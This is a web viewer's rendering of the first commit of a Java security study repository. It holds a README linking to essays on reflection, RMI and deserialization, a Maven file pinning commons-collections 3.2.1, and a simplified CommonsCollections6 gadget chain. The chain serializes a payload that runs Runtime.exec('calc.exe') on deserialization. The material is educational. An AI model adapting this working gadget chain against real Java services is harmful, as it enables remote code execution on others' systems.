| FazBrowse GitHub Viewer | Trending | | Home |
| Tools: [Download Repo ZIP] [Original HTTPS Page] |
0 parents commit c9fa885
5 files changed
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -0,0 +1,21 @@ | |||
| 1 | + # JavaThings - Java安全漫谈笔记相关 | ||
| 2 | + | ||
| 3 | + 《Java安全漫谈》是我在写的一点Java学习相关的随笔,不是很严谨,也不是啥高科技。这个Repository主要是记录并整理一下,附加一些代码。 | ||
| 4 | + | ||
| 5 | + ## Java安全漫谈目录 | ||
| 6 | + | ||
| 7 | + - [Java安全漫谈 - 01.反射篇(1)](https://t.zsxq.com/iyJiAMJ) | ||
| 8 | + - [Java安全漫谈 - 02.反射篇(2)](https://t.zsxq.com/iIa2B2j) | ||
| 9 | + - [Java安全漫谈 - 03.反射篇(3)](https://t.zsxq.com/MNRbayr) | ||
| 10 | + - [Java安全漫谈 - 04.RMI篇(1)](https://t.zsxq.com/FMJiUrV) | ||
| 11 | + - [Java安全漫谈 - 05.RMI篇(2)](https://t.zsxq.com/BuFy3zF) | ||
| 12 | + - [Java安全漫谈 - 06.RMI篇(3)](https://t.zsxq.com/vZjaiuR) | ||
| 13 | + - [Java安全漫谈 - 07.反序列化篇(1)](https://t.zsxq.com/NF2NfQf) | ||
| 14 | + - [Java安全漫谈 - 08.反序列化篇(2)](https://t.zsxq.com/ieMZBQj) | ||
| 15 | + - [Java安全漫谈 - 09.反序列化篇(3)](https://t.zsxq.com/BmIIAy3) | ||
| 16 | + - [Java安全漫谈 - 10.反序列化篇(4)](https://t.zsxq.com/ZNZrJMZ) | ||
| 17 | + - [Java安全漫谈 - 11.反序列化篇(5)](https://t.zsxq.com/FufUf2B) | ||
| 18 | + | ||
| 19 | + ## Demo代码 | ||
| 20 | + | ||
| 21 | + - 我简化的[CommonCollections6](deserialization/src/java/com/govuln/CommonsCollections6.java),更方便大家理解 | ||
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -0,0 +1,2 @@ | |||
| 1 | + <?xml version="1.0" encoding="UTF-8"?> | ||
| 2 | + <module type="JAVA_MODULE" version="4" /> | ||
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -0,0 +1,75 @@ | |||
| 1 | + <?xml version="1.0" encoding="UTF-8"?> | ||
| 2 | + | ||
| 3 | + <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | ||
| 4 | + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> | ||
| 5 | + <modelVersion>4.0.0</modelVersion> | ||
| 6 | + | ||
| 7 | + <groupId>com.govuln</groupId> | ||
| 8 | + <artifactId>deserialization</artifactId> | ||
| 9 | + <version>1.0-SNAPSHOT</version> | ||
| 10 | + | ||
| 11 | + <name>deserialization</name> | ||
| 12 | + <!-- FIXME change it to the project's website --> | ||
| 13 | + <url>http://www.example.com</url> | ||
| 14 | + | ||
| 15 | + <properties> | ||
| 16 | + <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding> | ||
| 17 | + <maven.compiler.source>1.7</maven.compiler.source> | ||
| 18 | + <maven.compiler.target>1.7</maven.compiler.target> | ||
| 19 | + </properties> | ||
| 20 | + | ||
| 21 | + <dependencies> | ||
| 22 | + <!-- https://mvnrepository.com/artifact/commons-collections/commons-collections --> | ||
| 23 | + <dependency> | ||
| 24 | + <groupId>commons-collections</groupId> | ||
| 25 | + <artifactId>commons-collections</artifactId> | ||
| 26 | + <version>3.2.1</version> | ||
| 27 | + </dependency> | ||
| 28 | + </dependencies> | ||
| 29 | + | ||
| 30 | + <build> | ||
| 31 | + <pluginManagement><!-- lock down plugins versions to avoid using Maven defaults (may be moved to parent pom) --> | ||
| 32 | + <plugins> | ||
| 33 | + <!-- clean lifecycle, see https://maven.apache.org/ref/current/maven-core/lifecycles.html#clean_Lifecycle --> | ||
| 34 | + <plugin> | ||
| 35 | + <artifactId>maven-clean-plugin</artifactId> | ||
| 36 | + <version>3.1.0</version> | ||
| 37 | + </plugin> | ||
| 38 | + <!-- default lifecycle, jar packaging: see https://maven.apache.org/ref/current/maven-core/default-bindings.html#Plugin_bindings_for_jar_packaging --> | ||
| 39 | + <plugin> | ||
| 40 | + <artifactId>maven-resources-plugin</artifactId> | ||
| 41 | + <version>3.0.2</version> | ||
| 42 | + </plugin> | ||
| 43 | + <plugin> | ||
| 44 | + <artifactId>maven-compiler-plugin</artifactId> | ||
| 45 | + <version>3.8.0</version> | ||
| 46 | + </plugin> | ||
| 47 | + <plugin> | ||
| 48 | + <artifactId>maven-surefire-plugin</artifactId> | ||
| 49 | + <version>2.22.1</version> | ||
| 50 | + </plugin> | ||
| 51 | + <plugin> | ||
| 52 | + <artifactId>maven-jar-plugin</artifactId> | ||
| 53 | + <version>3.0.2</version> | ||
| 54 | + </plugin> | ||
| 55 | + <plugin> | ||
| 56 | + <artifactId>maven-install-plugin</artifactId> | ||
| 57 | + <version>2.5.2</version> | ||
| 58 | + </plugin> | ||
| 59 | + <plugin> | ||
| 60 | + <artifactId>maven-deploy-plugin</artifactId> | ||
| 61 | + <version>2.8.2</version> | ||
| 62 | + </plugin> | ||
| 63 | + <!-- site lifecycle, see https://maven.apache.org/ref/current/maven-core/lifecycles.html#site_Lifecycle --> | ||
| 64 | + <plugin> | ||
| 65 | + <artifactId>maven-site-plugin</artifactId> | ||
| 66 | + <version>3.7.1</version> | ||
| 67 | + </plugin> | ||
| 68 | + <plugin> | ||
| 69 | + <artifactId>maven-project-info-reports-plugin</artifactId> | ||
| 70 | + <version>3.0.0</version> | ||
| 71 | + </plugin> | ||
| 72 | + </plugins> | ||
| 73 | + </pluginManagement> | ||
| 74 | + </build> | ||
| 75 | + </project> | ||
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -0,0 +1,58 @@ | |||
| 1 | + package com.govuln; | ||
| 2 | + | ||
| 3 | + import org.apache.commons.collections.Transformer; | ||
| 4 | + import org.apache.commons.collections.functors.ChainedTransformer; | ||
| 5 | + import org.apache.commons.collections.functors.ConstantTransformer; | ||
| 6 | + import org.apache.commons.collections.functors.InvokerTransformer; | ||
| 7 | + import org.apache.commons.collections.keyvalue.TiedMapEntry; | ||
| 8 | + import org.apache.commons.collections.map.LazyMap; | ||
| 9 | + | ||
| 10 | + import java.io.*; | ||
| 11 | + import java.lang.reflect.Field; | ||
| 12 | + import java.util.HashMap; | ||
| 13 | + import java.util.Map; | ||
| 14 | + | ||
| 15 | + public class CommonsCollections6 { | ||
| 16 | + public static void main(String[] args) throws Exception { | ||
| 17 | + Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; | ||
| 18 | + Transformer[] transformers = new Transformer[] { | ||
| 19 | + new ConstantTransformer(Runtime.class), | ||
| 20 | + new InvokerTransformer("getMethod", new Class[] { String.class, | ||
| 21 | + Class[].class }, new Object[] { "getRuntime", | ||
| 22 | + new Class[0] }), | ||
| 23 | + new InvokerTransformer("invoke", new Class[] { Object.class, | ||
| 24 | + Object[].class }, new Object[] { null, new Object[0] }), | ||
| 25 | + new InvokerTransformer("exec", new Class[] { String.class }, | ||
| 26 | + new String[] { "calc.exe" }), | ||
| 27 | + new ConstantTransformer(1), | ||
| 28 | + }; | ||
| 29 | + Transformer transformerChain = new ChainedTransformer(fakeTransformers); | ||
| 30 | + | ||
| 31 | + // 不再使用原CommonsCollections6中的HashSet,直接使用HashMap | ||
| 32 | + Map innerMap = new HashMap(); | ||
| 33 | + Map outerMap = LazyMap.decorate(innerMap, transformerChain); | ||
| 34 | + | ||
| 35 | + TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey"); | ||
| 36 | + | ||
| 37 | + Map expMap = new HashMap(); | ||
| 38 | + expMap.put(tme, "valuevalue"); | ||
| 39 | + | ||
| 40 | + outerMap.remove("keykey"); | ||
| 41 | + | ||
| 42 | + Field f = ChainedTransformer.class.getDeclaredField("iTransformers"); | ||
| 43 | + f.setAccessible(true); | ||
| 44 | + f.set(transformerChain, transformers); | ||
| 45 | + | ||
| 46 | + // ================== | ||
| 47 | + // 生成序列化字符串 | ||
| 48 | + ByteArrayOutputStream barr = new ByteArrayOutputStream(); | ||
| 49 | + ObjectOutputStream oos = new ObjectOutputStream(barr); | ||
| 50 | + oos.writeObject(expMap); | ||
| 51 | + oos.close(); | ||
| 52 | + | ||
| 53 | + // 本地测试触发 | ||
| 54 | + System.out.println(barr); | ||
| 55 | + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); | ||
| 56 | + Object o = (Object)ois.readObject(); | ||
| 57 | + } | ||
| 58 | + } | ||
| Back | FazBrowse Home | New Git URL |
0 commit comments